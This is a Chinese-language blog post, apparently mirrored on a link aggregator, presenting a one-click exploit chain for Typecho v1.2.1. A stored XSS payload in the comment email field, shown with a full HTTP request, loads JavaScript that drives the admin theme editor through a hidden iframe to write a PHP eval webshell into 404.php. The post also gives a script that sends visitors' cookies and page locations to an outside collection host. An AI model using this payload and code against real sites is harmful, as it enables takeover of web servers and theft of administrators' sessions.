Typecho v1.2.1 RCE
source link: https://5ime.cn/typecho-xss2rce.html
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Typecho v1.2.1 RCE
和前段时间的 PHPStudy RCE 一样是 1click,通过 存储型XSS 实现 RCE
今天关注到 Typecho Github仓库新增了一条 Issue :There’s still an XSS vulnerability in v1.2.1-rc,
漏洞产生的原因是因为对Typecho 1.2.0 XSS漏洞修复不全导致,Issue 中提到的 Payload 如下(漏洞点在Email,而1.2.0漏洞点在网址)
"></a><script>alert('hacked')</script>"@example.com
直接抓包发送请求
POST /index.php/archives/1/comment HTTP/1.1
Host: ty.la
Content-Length: 153
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ty.la
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ty.la/index.php/archives/1/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
author=%E6%B5%8B%E8%AF%95&mail="></a><script>alert('hacked')</script>"@example.com&url=&text=%E6%B5%8B%E8%AF%95&_=b04942bb37418474b1680405acf18a79
"></a><script/src=http://url/1.js></script>"@example.com
js 文件内容如下,脚本来源 https://github.com/typecho/typecho/issues/1545,主要是通过定义一个隐藏的 iframe
来操作 Typecho 内置的 编辑当前外观
功能来实现写入操作
function step1() {
var data2 = '<iframe id="testxss" src="/admin/theme-editor.php?theme=default&file=404.php" width="0%" height="0%" onload="poc()"></iframe>';
var oldata = document.body.innerHTML;
document.body.innerHTML = oldata + data2;
}
var times=0;
var g_shell=0;
function poc() {
if (times <= 10) {
var htmldata = document.getElementById("testxss").contentWindow.document.getElementById("content");
var btn = document.getElementById("testxss").contentWindow.document.getElementsByTagName("button");
olddatas = htmldata.innerText;
htmldata.innerText = "<?php @eval($_POST[cmd])?>\n" + olddatas;
btn[1].click();
times += 1;
if (g_shell == 1) {
var xhr1 = new XMLHttpRequest();
xhr1.open("get", "/usr/themes/default/404.php?shell=1");
xhr1.send();
} else {
return 0;
}
}
}
step1();
访问发现一句话木马已经被写入 404.php
文件
获取 Cookie 脚本
var website="http://xss.xxx.com";
(function(){(new Image()).src=website+'/?keepsession=1&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK